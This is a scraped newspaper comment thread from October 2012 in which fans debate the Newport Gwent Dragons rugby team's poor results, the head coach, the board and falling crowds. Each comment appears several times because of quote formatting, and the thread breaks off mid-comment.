refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nLinejudge, you have made my day. ", "so there are some out there who think the same as me. ", "The Dragons did very well on Saturday and it would have taken only a few more inches to have won that game with a supeb but fruitless effort by the pack. ", "Iwonder what the comment would have been had we scored that try at the end? ", "Perhaps there would not have been any comments from the non supporters or am I being a bit hard on them as they would have been full of praise for a hard fought win. ", "Getting a bit fed up with all the negativity being posted and the threat not to use or renew thier season tickets does make me wonder exactly whatright hav they to comment on a side they refuse to support in the first place, SW excused as he lives so far away, but some more real support would be nice.", "\n\n[quote][p][bold]Linejudge[/bold] wrote:\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT![/p][/quote]Linejudge, you have made my day. ", "so there are some out there who think the same as me. ", "The Dragons did very well on Saturday and it would have taken only a few more inches to have won that game with a supeb but fruitless effort by the pack. ", "Iwonder what the comment would have been had we scored that try at the end? ", "Perhaps there would not have been any comments from the non supporters or am I being a bit hard on them as they would have been full of praise for a hard fought win. ", "Getting a bit fed up with all the negativity being posted and the threat not to use or renew thier season tickets does make me wonder exactly whatright hav they to comment on a side they refuse to support in the first place, SW excused as he lives so far away, but some more real support would be nice.", "Robert Shillabeer\n\nLinejudge wrote…\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nLinejudge, you have made my day. ", "so there are some out there who think the same as me. ", "The Dragons did very well on Saturday and it would have taken only a few more inches to have won that game with a supeb but fruitless effort by the pack. ", "Iwonder what the comment would have been had we scored that try at the end? ", "Perhaps there would not have been any comments from the non supporters or am I being a bit hard on them as they would have been full of praise for a hard fought win. ", "Getting a bit fed up with all the negativity being posted and the threat not to use or renew thier season tickets does make me wonder exactly whatright hav they to comment on a side they refuse to support in the first place, SW excused as he lives so far away, but some more real support would be nice.", "\n\nScore: 0\n\nMonster Munch McCoy\n5:56pm Mon 22 Oct 12\n\nLinejudge wrote…\n\nDragons den......it will fall on deaf ears...\n\nLinejudge and Dragons Den. ", "I think you will find most people who criticise are true supporters and mainly ST holders. ", "Thats why they are so passionate about the way the region has been going downhill for the past season and a half and why they criticise on these threats and call for change. ", "They want and expect better performances from a professional team. ", "They also turn up each week rain or shine a support the team.", "\nThey do not want to criticise each week and would prefer to be talking about great victories but the frustration with the results and performance and lack of direction is driving the view on these threads. ", "I am a very optomistic person but can see very little at the dragons at present that shows me there is better to come in the near future (apart from the 6 pint dispenser in the Watkins bar that has sped things up a bit).", "\nBalance view from Saturday:\nPros\nA better performance\nAndy T's best game.", "\nOwen Evans look decent\nCons\nWe still lost\nChav never got the ball (Sell him and use the money on the front row). ", "Not his fault but an unnecessary expense at present.", "\nNimmo is not living up to expectation.", "\n\nCOME ON THE DRAGONS!!!!", "\n\n[quote][p][bold]Linejudge[/bold] wrote:\nDragons den......it will fall on deaf ears...[/p][/quote]Linejudge and Dragons Den. ", "I think you will find most people who criticise are true supporters and mainly ST holders. ", "Thats why they are so passionate about the way the region has been going downhill for the past season and a half and why they criticise on these threats and call for change. ", "They want and expect better performances from a professional team. ", "They also turn up each week rain or shine a support the team.", "\nThey do not want to criticise each week and would prefer to be talking about great victories but the frustration with the results and performance and lack of direction is driving the view on these threads. ", "I am a very optomistic person but can see very little at the dragons at present that shows me there is better to come in the near future (apart from the 6 pint dispenser in the Watkins bar that has sped things up a bit).", "\nBalance view from Saturday:\nPros\nA better performance\nAndy T's best game.", "\nOwen Evans look decent\nCons\nWe still lost\nChav never got the ball (Sell him and use the money on the front row). ", "Not his fault but an unnecessary expense at present.", "\nNimmo is not living up to expectation.", "\nCOME ON THE DRAGONS!!!!Monster Munch McCoy\n\nLinejudge wrote…\n\nDragons den......it will fall on deaf ears...\n\nLinejudge and Dragons Den. ", "I think you will find most people who criticise are true supporters and mainly ST holders. ", "Thats why they are so passionate about the way the region has been going downhill for the past season and a half and why they criticise on these threats and call for change. ", "They want and expect better performances from a professional team. ", "They also turn up each week rain or shine a support the team.", "\nThey do not want to criticise each week and would prefer to be talking about great victories but the frustration with the results and performance and lack of direction is driving the view on these threads. ", "I am a very optomistic person but can see very little at the dragons at present that shows me there is better to come in the near future (apart from the 6 pint dispenser in the Watkins bar that has sped things up a bit).", "\nBalance view from Saturday:\nPros\nA better performance\nAndy T's best game.", "\nOwen Evans look decent\nCons\nWe still lost\nChav never got the ball (Sell him and use the money on the front row). ", "Not his fault but an unnecessary expense at present.", "\nNimmo is not living up to expectation.", "\n\nCOME ON THE DRAGONS!!!!", "\n\nScore: 0\n\nnumber12\n9:37pm Mon 22 Oct 12\n\nDoberman1 wrote…\n\nLinejudge wrote…\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nST holder who goes to every game thank you.", "\nIf only people respected others right to comment,whatever their opinion. ", "It's called free speech, don't like it....move to China.", "\nIt's a results business professional sport and ours are not (for a long time) good enough. ", "When I go and watch sport on a local park for free I don't mind seeing amateur behaviour and performances, when I pay to watch proffesional sport I expect to see proffesionalism, not too much to ask is it?", "\nTRUTH HURTS?", "\n\ngood comeback! ", "summed it all up rather well I thought!", "\n\n[quote][p][bold]Doberman1[/bold] wrote:\n[quote][p][bold]Linejudge[/bold] wrote:\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT![/p][/quote]ST holder who goes to every game thank you.", "\nIf only people respected others right to comment,whatever their opinion. ", "It's called free speech, don't like it....move to China.", "\nIt's a results business professional sport and ours are not (for a long time) good enough. ", "When I go and watch sport on a local park for free I don't mind seeing amateur behaviour and performances, when I pay to watch proffesional sport I expect to see proffesionalism, not too much to ask is it?", "\nTRUTH HURTS?[/p][/quote]good comeback! ", "summed it all up rather well I thought!number12\n\nDoberman1 wrote…\n\nLinejudge wrote…\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nST holder who goes to every game thank you.", "\nIf only people respected others right to comment,whatever their opinion. ", "It's called free speech, don't like it....move to China.", "\nIt's a results business professional sport and ours are not (for a long time) good enough. ", "When I go and watch sport on a local park for free I don't mind seeing amateur behaviour and performances, when I pay to watch proffesional sport I expect to see proffesionalism, not too much to ask is it?", "\nTRUTH HURTS?", "\n\ngood comeback! ", "summed it all up rather well I thought!", "\n\nScore: 0\n\nDragons den\n10:11pm Mon 22 Oct 12\n\nRobert ... It would seem that loyal ST's don't really want to criticise but feel the have to!", "\nArrh.... How sweet , one day they will realise that all the **** and negative comments are not doing anyone any favours.", "\nThank god those that can influence the Dragons don't listen to this crap !", "\n\nRobert ... It would seem that loyal ST's don't really want to criticise but feel the have to!", "\nArrh.... How sweet , one day they will realise that all the **** and negative comments are not doing anyone any favours.", "\nThank god those that can influence the Dragons don't listen to this crap !", "Dragons den\n\nRobert ... It would seem that loyal ST's don't really want to criticise but feel the have to!", "\nArrh.... How sweet , one day they will realise that all the **** and negative comments are not doing anyone any favours.", "\nThank god those that can influence the Dragons don't listen to this crap !", "\n\nScore: 0\n\nDoberman1\n10:58pm Mon 22 Oct 12\n\nDragons den wrote…\n\nRobert ... It would seem that loyal ST's don't really want to criticise but feel the have to!", "\nArrh.... How sweet , one day they will realise that all the **** and negative comments are not doing anyone any favours.", "\nThank god those that can influence the Dragons don't listen to this crap !", "\n\nAnd burying your head in the sand whilst wearing your rose tinted specs is clearly the way forward. ", "Let's excuse abject results with a shrug of the shoulders and the hope that it might get better soon, without ever offering a view as to how to improve. ", "Your whole approach smacks of the Rugby Club committees of yesteryear, amateurish.", "\nLet's hope that you are never anything to do with a proffesional sports team, your lofty aspirations at being content at the bottom of the league will no doubt be a real selling point to potential major sponsors or investors....\"come and put your money into my team, we never win but we try hard\", will really have them rushing to be associated with us.", "\nLet's hope those in charge at the Dragons do not get infected with your lack of ambition....or are they already?", "\n\n[quote][p][bold]Dragons den[/bold] wrote:\nRobert ... It would seem that loyal ST's don't really want to criticise but feel the have to!", "\nArrh.... How sweet , one day they will realise that all the **** and negative comments are not doing anyone any favours.", "\nThank god those that can influence the Dragons don't listen to this crap ![", "/p][/quote]And burying your head in the sand whilst wearing your rose tinted specs is clearly the way forward. ", "Let's excuse abject results with a shrug of the shoulders and the hope that it might get better soon, without ever offering a view as to how to improve. ", "Your whole approach smacks of the Rugby Club committees of yesteryear, amateurish.", "\nLet's hope that you are never anything to do with a proffesional sports team, your lofty aspirations at being content at the bottom of the league will no doubt be a real selling point to potential major sponsors or investors....\"come and put your money into my team, we never win but we try hard\", will really have them rushing to be associated with us.", "\nLet's hope those in charge at the Dragons do not get infected with your lack of ambition....or are they already?Doberman1\n\nDragons den wrote…\n\nRobert ... It would seem that loyal ST's don't really want to criticise but feel the have to!", "\nArrh.... How sweet , one day they will realise that all the **** and negative comments are not doing anyone any favours.", "\nThank god those that can influence the Dragons don't listen to this crap !", "\n\nAnd burying your head in the sand whilst wearing your rose tinted specs is clearly the way forward. ", "Let's excuse abject results with a shrug of the shoulders and the hope that it might get better soon, without ever offering a view as to how to improve. ", "Your whole approach smacks of the Rugby Club committees of yesteryear, amateurish.", "\nLet's hope that you are never anything to do with a proffesional sports team, your lofty aspirations at being content at the bottom of the league will no doubt be a real selling point to potential major sponsors or investors....\"come and put your money into my team, we never win but we try hard\", will really have them rushing to be associated with us.", "\nLet's hope those in charge at the Dragons do not get infected with your lack of ambition....or are they already?", "\n\nScore: 0\n\nRobert Shillabeer\n11:51pm Mon 22 Oct 12\n\nDoberman it is nothing to do with toeing the line or sticking ones head in the sand. ", "It's about being fair to all points of view. ", "Most views expressed have been critical without having insider knowledge, my views suffer the same condition so it is purely my view of things. ", "The last game we were very unlucky not to get that try, praise is due to the team for the effort. ", "The ref made a few decisions early on that we're very questionable, but there were more decisions that could have been questioned by both sides, that's the nature of games were ref decisions effect the end result. ", "As the old saying goes s**t sticks, ok we move on. ", "To ridicule the effort is unforgivable, total commitment from all the team was evident and must be praised, because to cry that down as many have on this site is to destroy ant hope for the future.", "\n\nDoberman it is nothing to do with toeing the line or sticking ones head in the sand. ", "It's about being fair to all points of view. ", "Most views expressed have been critical without having insider knowledge, my views suffer the same condition so it is purely my view of things. ", "The last game we were very unlucky not to get that try, praise is due to the team for the effort. ", "The ref made a few decisions early on that we're very questionable, but there were more decisions that could have been questioned by both sides, that's the nature of games were ref decisions effect the end result. ", "As the old saying goes s**t sticks, ok we move on. ", "To ridicule the effort is unforgivable, total commitment from all the team was evident and must be praised, because to cry that down as many have on this site is to destroy ant hope for the future.", "Robert Shillabeer\n\nDoberman it is nothing to do with toeing the line or sticking ones head in the sand. ", "It's about being fair to all points of view. ", "Most views expressed have been critical without having insider knowledge, my views suffer the same condition so it is purely my view of things. ", "The last game we were very unlucky not to get that try, praise is due to the team for the effort. ", "The ref made a few decisions early on that we're very questionable, but there were more decisions that could have been questioned by both sides, that's the nature of games were ref decisions effect the end result. ", "As the old saying goes s**t sticks, ok we move on. ", "To ridicule the effort is unforgivable, total commitment from all the team was evident and must be praised, because to cry that down as many have on this site is to destroy ant hope for the future.", "\n\nScore: 0\n\nDoberman1\n8:45am Tue 23 Oct 12\n\nRobert Shillabeer wrote…\n\nDoberman it is nothing to do with toeing the line or sticking ones head in the sand. ", "It's about being fair to all points of view. ", "Most views expressed have been critical without having insider knowledge, my views suffer the same condition so it is purely my view of things. ", "The last game we were very unlucky not to get that try, praise is due to the team for the effort. ", "The ref made a few decisions early on that we're very questionable, but there were more decisions that could have been questioned by both sides, that's the nature of games were ref decisions effect the end result. ", "As the old saying goes s**t sticks, ok we move on. ", "To ridicule the effort is unforgivable, total commitment from all the team was evident and must be praised, because to cry that down as many have on this site is to destroy ant hope for the future.", "\n\nRobert - in the case of the last game I acknowledged the effort of the team as you will see on the result thread. ", "I wil always acknowledge effort when I see it as I will always support my team whilst watching them.", "\nAll the other things you elude to such as ref's, the \"nearly try\", injuries etc happen to every other club in sport week in week out and in my view they tend to balance out across all clubs in a season.....but we are still bottom of the league (not even considering zebre)...why is that?", "\nI could provide a long list of club related stuff which confirms amateur attitudes exist from the top down and certainly does nothing to suggest a proffesional approach is taken to anything at RP. ", "But the main thrux of my (and loads of others) supposed negativity is in relation to DE who, like it or not is responsible for preparing the team and thus responsible for the results. ", "In any proffesional sporting team the coach has to be responsible for results and in any proffesional team who had the results we have had under DE the coach would be removed from position. ", "He has a contract which has to be dealt with...so it needs to be dealt with, not put up as an excuse for no action.", "\nI have asked you and others to explain what DE has done in terms of progression of the team, no response yet.", "\nEffort is one thing but sadly it does not win games alone, we need more. ", "DE is out of his depth, it was a trial that simply has not worked and needs to be ended otherwise prepare for more defeats, more frustration, dwindling crowds leading to more financial issues and all that comes with it.", "\nTo your other point about Toby and Dan....do you really believe they will stick with us? ", "I would wager they will be gone at the end of the season, sadly.", "\n\n[quote][p][bold]Robert Shillabeer[/bold] wrote:\nDoberman it is nothing to do with toeing the line or sticking ones head in the sand. ", "It's about being fair to all points of view. ", "Most views expressed have been critical without having insider knowledge, my views suffer the same condition so it is purely my view of things. ", "The last game we were very unlucky not to get that try, praise is due to the team for the effort. ", "The ref made a few decisions early on that we're very questionable, but there were more decisions that could have been questioned by both sides, that's the nature of games were ref decisions effect the end result. ", "As the old saying goes s**t sticks, ok we move on. ", "To ridicule the effort is unforgivable, total commitment from all the team was evident and must be praised, because to cry that down as many have on this site is to destroy ant hope for the future.[/p][/quote]Robert - in the case of the last game I acknowledged the effort of the team as you will see on the result thread. ", "I wil always acknowledge effort when I see it as I will always support my team whilst watching them.", "\nAll the other things you elude to such as ref's, the \"nearly try\", injuries etc happen to every other club in sport week in week out and in my view they tend to balance out across all clubs in a season.....but we are still bottom of the league (not even considering zebre)...why is that?", "\nI could provide a long list of club related stuff which confirms amateur attitudes exist from the top down and certainly does nothing to suggest a proffesional approach is taken to anything at RP. ", "But the main thrux of my (and loads of others) supposed negativity is in relation to DE who, like it or not is responsible for preparing the team and thus responsible for the results. ", "In any proffesional sporting team the coach has to be responsible for results and in any proffesional team who had the results we have had under DE the coach would be removed from position. ", "He has a contract which has to be dealt with...so it needs to be dealt with, not put up as an excuse for no action.", "\nI have asked you and others to explain what DE has done in terms of progression of the team, no response yet.", "\nEffort is one thing but sadly it does not win games alone, we need more. ", "DE is out of his depth, it was a trial that simply has not worked and needs to be ended otherwise prepare for more defeats, more frustration, dwindling crowds leading to more financial issues and all that comes with it.", "\nTo your other point about Toby and Dan....do you really believe they will stick with us? ", "I would wager they will be gone at the end of the season, sadly.", "Doberman1\n\nRobert Shillabeer wrote…\n\nDoberman it is nothing to do with toeing the line or sticking ones head in the sand. ", "It's about being fair to all points of view. ", "Most views expressed have been critical without having insider knowledge, my views suffer the same condition so it is purely my view of things. ", "The last game we were very unlucky not to get that try, praise is due to the team for the effort. ", "The ref made a few decisions early on that we're very questionable, but there were more decisions that could have been questioned by both sides, that's the nature of games were ref decisions effect the end result. ", "As the old saying goes s**t sticks, ok we move on. ", "To ridicule the effort is unforgivable, total commitment from all the team was evident and must be praised, because to cry that down as many have on this site is to destroy ant hope for the future.", "\n\nRobert - in the case of the last game I acknowledged the effort of the team as you will see on the result thread. ", "I wil always acknowledge effort when I see it as I will always support my team whilst watching them.", "\nAll the other things you elude to such as ref's, the \"nearly try\", injuries etc happen to every other club in sport week in week out and in my view they tend to balance out across all clubs in a season.....but we are still bottom of the league (not even considering zebre)...why is that?", "\nI could provide a long list of club related stuff which confirms amateur attitudes exist from the top down and certainly does nothing to suggest a proffesional approach is taken to anything at RP. ", "But the main thrux of my (and loads of others) supposed negativity is in relation to DE who, like it or not is responsible for preparing the team and thus responsible for the results. ", "In any proffesional sporting team the coach has to be responsible for results and in any proffesional team who had the results we have had under DE the coach would be removed from position. ", "He has a contract which has to be dealt with...so it needs to be dealt with, not put up as an excuse for no action.", "\nI have asked you and others to explain what DE has done in terms of progression of the team, no response yet.", "\nEffort is one thing but sadly it does not win games alone, we need more. ", "DE is out of his depth, it was a trial that simply has not worked and needs to be ended otherwise prepare for more defeats, more frustration, dwindling crowds leading to more financial issues and all that comes with it.", "\nTo your other point about Toby and Dan....do you really believe they will stick with us? ", "I would wager they will be gone at the end of the season, sadly.", "\n\nScore: 0\n\nRobFord\n9:14am Tue 23 Oct 12\n\nI've been supporting rugby at Newport for a very long time and have had a ST most of the time, but this is my last year, I've had enough. ", "The crowd last weekend was just over 4000, so so poor for what was meant to be an enlargement of numbers when 'regional' rugby was introduced. ", "NEWPORT GD's have failed since its inception and Newport RFC prior to this, with the exception of the Brown years, was a poor team also for a long time. ", "The record and facts are there and yes coaching is vital, but it is the poor management that is ultimately responsible for creating success and they have failed consistently. ", "I understand perfectly that the WRU have been selfish by creating success for the national side at the expense of so-called 'regional rugby' but like many supporters I have no time for the people in charge, they have no idea to run rugby as a business since the turn to professionalism. ", "Okay Tony Brown is the exception, but he should have got rid of the old amateurs and developed a good business plan by bringing in other business interests. ", "For me and I think for many others judging by the lack of numbers at RP it may not have been so bad if there had been more honesty about 'regional' rugby. ", "They are mostly club based and even the O's have a Swansea base. ", "This isn't just a Newport issue, as we know Welsh rugby at club level is and has been in crisis for years and whilst this goes on the WRU by selling tickets via ticketmaster for Welsh games is a disgrace because the expense of those tickets have also alienated many supporters from the game. ", "I think that new euro shirt is very apt because it truly reflects the mess that is NEWPORT GD's.", "\n\nI've been supporting rugby at Newport for a very long time and have had a ST most of the time, but this is my last year, I've had enough. ", "The crowd last weekend was just over 4000, so so poor for what was meant to be an enlargement of numbers when 'regional' rugby was introduced. ", "NEWPORT GD's have failed since its inception and Newport RFC prior to this, with the exception of the Brown years, was a poor team also for a long time. ", "The record and facts are there and yes coaching is vital, but it is the poor management that is ultimately responsible for creating success and they have failed consistently. ", "I understand perfectly that the WRU have been selfish by creating success for the national side at the expense of so-called 'regional rugby' but like many supporters I have no time for the people in charge, they have no idea to run rugby as a business since the turn to professionalism. ", "Okay Tony Brown is the exception, but he should have got rid of the old amateurs and developed a good business plan by bringing in other business interests. ", "For me and I think for many others judging by the lack of numbers at RP it may not have been so bad if there had been more honesty about 'regional' rugby. ", "They are mostly club based and even the O's have a Swansea base. ", "This isn't just a Newport issue, as we know Welsh rugby at club level is and has been in crisis for years and whilst this goes on the WRU by selling tickets via ticketmaster for Welsh games is a disgrace because the expense of those tickets have also alienated many supporters from the game. ", "I think that new euro shirt is very apt because it truly reflects the mess that is NEWPORT GD's.", "RobFord\n\nI've been supporting rugby at Newport for a very long time and have had a ST most of the time, but this is my last year, I've had enough. ", "The crowd last weekend was just over 4000, so so poor for what was meant to be an enlargement of numbers when 'regional' rugby was introduced. ", "NEWPORT GD's have failed since its inception and Newport RFC prior to this, with the exception of the Brown years, was a poor team also for a long time. ", "The record and facts are there and yes coaching is vital, but it is the poor management that is ultimately responsible for creating success and they have failed consistently. ", "I understand perfectly that the WRU have been selfish by creating success for the national side at the expense of so-called 'regional rugby' but like many supporters I have no time for the people in charge, they have no idea to run rugby as a business since the turn to professionalism. ", "Okay Tony Brown is the exception, but he should have got rid of the old amateurs and developed a good business plan by bringing in other business interests. ", "For me and I think for many others judging by the lack of numbers at RP it may not have been so bad if there had been more honesty about 'regional' rugby. ", "They are mostly club based and even the O's have a Swansea base. ", "This isn't just a Newport issue, as we know Welsh rugby at club level is and has been in crisis for years and whilst this goes on the WRU by selling tickets via ticketmaster for Welsh games is a disgrace because the expense of those tickets have also alienated many supporters from the game. ", "I think that new euro shirt is very apt because it truly reflects the mess that is NEWPORT GD's.", "\n\nScore: 0\n\nRobert Shillabeer\n2:04pm Tue 23 Oct 12\n\nDoberman you say that more needs to be done, agree there needs to be a bit more detail made known about how the region ticks. ", "I don't agree however with the slur that the management is amaturist. ", "Most of the board are involved with some quiet successful companies or have been involved with running businesses amatur or professional they all need to make money or be efficient. ", "I suggest you volunteer to run at board level at the Dragons to get an understanding f exactly they do, then perhaps you will understand a bit more about the problems of managing such a business. ", "As for ring the head coach why not volunteer to shadow DE to get a better understanding of what he does. ", "Just a suggestion.", "\n\nDoberman you say that more needs to be done, agree there needs to be a bit more detail made known about how the region ticks. ", "I don't agree however with the slur that the management is amaturist. ", "Most of the board are involved with some quiet successful companies or have been involved with running businesses amatur or professional they all need to make money or be efficient. ", "I suggest you volunteer to run at board level at the Dragons to get an understanding f exactly they do, then perhaps you will understand a bit more about the problems of managing such a business. ", "As for ring the head coach why not volunteer to shadow DE to get a better understanding of what he does. ", "Just a suggestion.", "Robert Shillabeer\n\nDoberman you say that more needs to be done, agree there needs to be a bit more detail made known about how the region ticks. ", "I don't agree however with the slur that the management is amaturist. ", "Most of the board are involved with some quiet successful companies or have been involved with running businesses amatur or professional they all need to make money or be efficient. ", "I suggest you volunteer to run at board level at the Dragons to get an understanding f exactly they do, then perhaps you will understand a bit more about the problems of managing such a business. ", "As for ring the head coach why not volunteer to shadow DE to get a better understanding of what he does. ", "Just a suggestion.", "\n\nScore: 0\n\nDai the Milk\n6:46pm Tue 23 Oct 12\n\nJust a matter of time before this not-so-super club goes to the wall. ", "That's what happens when you behave selfishly and form a club masquerading as a region to the exclusion of other Gwent clubs. ", "Hoist by their own petard.", "\n\nJust a matter of time before this not-so-super club goes to the wall. ", "That's what happens when you behave selfishly and form a club masquerading as a region to the exclusion of other Gwent clubs. ", "Hoist by their own petard.", "Dai the Milk\n\nJust a matter of time before this not-so-super club goes to the wall. ", "That's what happens when you behave selfishly and form a club masquerading as a region to the exclusion of other Gwent clubs. ", "Hoist by their own petard.", "\n\nScore: 0\n\n[deleted]\n10:22pm Tue 23 Oct 12\n\n[deleted]\n\n**** Dai, I don't swear very often but that is crap. ", "Appologies for using such language. ", "It really annoys me when plebs just talk such s**t. ", "The regions are the first tier in Welsh rugby just like Irish rugby because to spread the better players to thinly will not improve the game in Wales and we would very soon be below the likes of Italy and other east European countries. ", "There is not enough cash in Wales to support ten sides at such a good standard to meet the needs of the WRU, that's why the WRU must put more money not regional rugby or lose thier player stream and the loss of status and money into Welsh rugby resulting n the demise of rugby as the national sport which would still be played but at an amateur standard which very few people would find matter a s**t.", "Robert Shillabeer\n\n**** Dai, I don't swear very often but that is crap. ", "Appologies for using such language. ", "It really annoys me when plebs just talk such s**t. ", "The regions are the first tier in Welsh rugby just like Irish rugby because to spread the better players to thinly will not improve the game in Wales and we would very soon be below the likes of Italy and other east European countries. ", "There is not enough cash in Wales to support ten sides at such a good standard to meet the needs of the WRU, that's why the WRU must put more money not regional rugby or lose thier player stream and the loss of status and money into Welsh rugby resulting n the demise of rugby as the national sport which would still be played but at an amateur standard which very few people would find matter a s**t.", "\n\nScore: 0\n\ncorpardguy\n12:51am Wed 24 Oct 12\n\nOK OK everyone has staked their position........\n\nNow hands up who thinks the board should resign?", "\nHands up who thinks its Lack of Cash?", "\nHands up who thinks DE should Go?", "\nHands up who thinks its the players not trying hard enough?", "\nHands up who thinks its conditioning?", "\nhands up who thinks its because we are called NEWPORT Gwent Dragons?", "\nHands up who thinks its a ref's conspiracy?", "\nPersonally I think DE has had a good go at this and he is falling short. ", "I think the players are working hard, and most can compete consistently with the rest of the Rabo on pretty equal basis (except the Front five). ", "Often it seems there is no game plan and we REACT react to the opposition too much rather than taking the game to them especially at home! (", "thats DE fault in my book.)", "\n\nForget about the Ref's its out of our control, get on with it.", "\nBoards not going anywhere soon, and anyway who would come in place??", "\nDE can Go! ", "Enough money, a Vision going forward, and a good challenge with a couple of good Wales/ world class palyers and a couple more just on the cusp should bring a few decent inquiries I believe. (", "Ruddock!??!)", "\nCrowds follow success, Jesus! ....", "they even follow NGD....... They will come back.", "\n\nOK OK everyone has staked their position........\nNow hands up who thinks the board should resign?", "\nHands up who thinks its Lack of Cash?", "\nHands up who thinks DE should Go?", "\nHands up who thinks its the players not trying hard enough?", "\nHands up who thinks its conditioning?", "\nhands up who thinks its because we are called NEWPORT Gwent Dragons?", "\nHands up who thinks its a ref's conspiracy?", "\nPersonally I think DE has had a good go at this and he is falling short. ", "I think the players are working hard, and most can compete consistently with the rest of the Rabo on pretty equal basis (except the Front five). ", "Often it seems there is no game plan and we REACT react to the opposition too much rather than taking the game to them especially at home! (", "thats DE fault in my book.)", "\nForget about the Ref's its out of our control, get on with it.", "\nBoards not going anywhere soon, and anyway who would come in place??", "\nDE can Go! ", "Enough money, a Vision going forward, and a good challenge with a couple of good Wales/ world class palyers and a couple more just on the cusp should bring a few decent inquiries I believe. (", "Ruddock!??!)", "\nCrowds follow success, Jesus! ....", "they even follow NGD....... They will come back.corpardguy\n\nOK OK everyone has staked their position........\n\nNow hands up who thinks the board should resign?", "\nHands up who thinks its Lack of Cash?", "\nHands up who thinks DE should Go?", "\nHands up who thinks its the players not trying hard enough?", "\nHands up who thinks its conditioning?", "\nhands up who thinks its because we are called NEWPORT Gwent Dragons?", "\nHands up who thinks its a ref's conspiracy?", "\nPersonally I think DE has had a good go at this and he is falling short. ", "I think the players are working hard, and most can compete consistently with the rest of the Rabo on pretty equal basis (except the Front five). ", "Often it seems there is no game plan and we REACT react to the opposition too much rather than taking the game to them especially at home! (", "thats DE fault in my book.)", "\n\nForget about the Ref's its out of our control, get on with it.", "\nBoards not going anywhere soon, and anyway who would come in place??", "\nDE can Go! ", "Enough money, a Vision going forward, and a good challenge with a couple of good Wales/ world class palyers and a couple more just on the cusp should bring a few decent inquiries I believe. (", "Ruddock!??!)", "\nCrowds follow success, Jesus! ....", "they even follow NGD....... They will come back.", "\n\nScore: 0\n\nDoberman1\n2:49pm Wed 24 Oct 12\n\nRobert Shillabeer wrote…\n\n**** Dai, I don't swear very often but that is crap. ", "Appologies for using such language. ", "It really annoys me when plebs just talk such s**t. ", "The regions are the first tier in Welsh rugby just like Irish rugby because to spread the better players to thinly will not improve the game in Wales and we would very soon be below the likes of Italy and other east European countries. ", "There is not enough cash in Wales to support ten sides at such a good standard to meet the needs of the WRU, that's why the WRU must put more money not regional rugby or lose thier player stream and the loss of status and money into Welsh rugby resulting n the demise of rugby as the national sport which would still be played but at an amateur standard which very few people would find matter a s**t.", "\n\nPlebs.....come on Robert, you need to be better than that. ", "It's a debate not an insult forum.", "\n\n[quote][p][bold]Robert Shillabeer[/bold] wrote:\n**** Dai, I don't swear very often but that is crap. ", "Appologies for using such language. ", "It really annoys me when plebs just talk such s**t. ", "The regions are the first tier in Welsh rugby just like Irish rugby because to spread the better players to thinly will not improve the game in Wales and we would very soon be below the likes of Italy and other east European countries. ", "There is not enough cash in Wales to support ten sides at such a good standard to meet the needs of the WRU, that's why the WRU must put more money not regional rugby or lose thier player stream and the loss of status and money into Welsh rugby resulting n the demise of rugby as the national sport which would still be played but at an amateur standard which very few people would find matter a s**t.[/p][/quote]Plebs.....come on Robert, you need to be better than that. ", "It's a debate not an insult forum.", "Doberman1\n\nRobert Shillabeer wrote…\n\n**** Dai, I don't swear very often but that is crap. ", "Appologies for using such language. ", "It really annoys me when plebs just talk such s**t. ", "The regions are the first tier in Welsh rugby just like Irish rugby because to spread the better players to thinly will not improve the game in Wales and we would very soon be below the likes of Italy and other east European countries. ", "There is not enough cash in Wales to support ten sides at such a good standard to meet the needs of the WRU, that's why the WRU must put more money not regional rugby or lose thier player stream and the loss of status and money into Welsh rugby resulting n the demise of rugby as the national sport which would still be played but at an amateur standard which very few people would find matter a s**t.", "\n\nPlebs.....come on Robert, you need to be better than that. ", "It's a debate not an insult forum.", "\n\nScore: 0\n\nRobert Shillabeer\n3:04pm Wed 24 Oct 12\n\nThought that would get a comment, don't agree with the term one bit but it got a reaction. ", "There are far to many postings on this forum about individuals competence, discuss if they are right or wrong in what. ", "They do but don't question thier competence as some have. ", "Just try and do it for a while and you may well understand the problems they face is all I was trying to suggest.", "\n\nThought that would get a comment, don't agree with the term one bit but it got a reaction. ", "There are far to many postings on this forum about individuals competence, discuss if they are right or wrong in what. ", "They do but don't question thier competence as some have. ", "Just try and do it for a while and you may well understand the problems they face is all I was trying to suggest.", "Robert Shillabeer\n\nThought that would get a comment, don't agree with the term one bit but it got a reaction. ", "There are far to many postings on this forum about individuals competence, discuss if they are right or wrong in what. ", "They do but don't question thier competence as some have. ", "Just try and do it for a while and you may well understand the problems they face is all I was trying to suggest.", "\n\nScore: 0\n\nRobert Shillabeer\n11:35pm Wed 24 Oct 12\n\nSeems I've over stepped the bounds of fair comment, the moderators have been in touch. ", "No offence was intended but suffice to say its a two way road. ", "I will observe the moderators comments and expect other to do the same, I am entitled to my view so please fair comment in future.", "\n\nSeems I've over 